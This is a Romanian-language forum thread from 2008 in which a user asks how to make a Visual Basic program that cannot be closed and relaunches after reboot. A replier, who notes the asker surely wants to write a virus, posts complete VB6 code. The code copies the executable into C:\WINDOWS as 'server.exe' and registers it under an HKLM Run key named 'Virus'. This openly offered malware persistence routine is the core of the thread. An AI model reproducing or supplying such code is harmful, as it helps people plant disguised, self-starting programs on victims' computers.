lucian.m Posted October 19, 2008 Report Share Posted October 19, 2008 Salut,Cum pot face ca la un executabil (creat in visual basic ) odata deschis sa numai poata fi inchis nici macar din task manager sau cu restart (dupa restart sa ruleze automat executabilu)Va multam"esc" anticipat Quote Link to comment Share on other sites More sharing options...
CeeJay Posted October 20, 2008 Report Share Posted October 20, 2008 (edited) nu il poti face sa aibe un proces "imun", insa chestia cu startup-ul se poate, din registry si anume: deschizi CMD si scrii: "regedit", apoi mergi la HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run si il adaugi acoloEdit:daca vrei sa introduci chestia asta in codul sursa, folosesti RegWrite si scrii in registry la HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN\ un regkey a carui valoare e locatia executabilului Edited October 20, 2008 by CeeJay Quote Link to comment Share on other sites More sharing options...
Vlachs Posted October 20, 2008 Report Share Posted October 20, 2008 1. parca in vb.net e regwrite el cred ca foloseste vb 6 , acolo tre sa "declari" chestiile alea pt lucru cu registri 2.el sigur vrea sa faca "un virus" , pui sa se copie intr-un folder si sa adauge in regsitri adresa unde sa copiat 3.revin cand o sa fiu treaz Quote Link to comment Share on other sites More sharing options...
CeeJay Posted October 20, 2008 Report Share Posted October 20, 2008 (edited) 1. parca in vb.net e regwrite el cred ca foloseste vb 6 , acolo tre sa "declari" chestiile alea pt lucru cu registriin afara de API-uri poate folosi si WScript2.el sigur vrea sa faca "un virus" , pui sa se copie intr-un folder si sa adauge in regsitri adresa unde sa copiatin cazul asta i-am scris eu tot codul:Private Sub Form_Load()FileCopy App.Path & "/" & App.EXEName & ".exe", "C:\WINDOWS\server.exe" ' Se copiaza in C:\WINDOWS cu numele "server.exe"Dim startup 'se declara variabila "startup"Set startup = CreateObject("WScript.Shell") ' Se creeaza obiectul WScriptstartup.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Virus", "C:\WINDOWS\server.exe" 'se scrie in regisry key-ul "Virus", care va avea ca valoare locatia scrisa mai sus (C:\WINDOWS\server.exe)End Sub3.revin cand o sa fiu treaz ahahahahhahaha Edited October 20, 2008 by CeeJay Quote Link to comment Share on other sites More sharing options...
lucian.m Posted October 20, 2008 Author Report Share Posted October 20, 2008 Multam la amandoi ! Quote Link to comment Share on other sites More sharing options...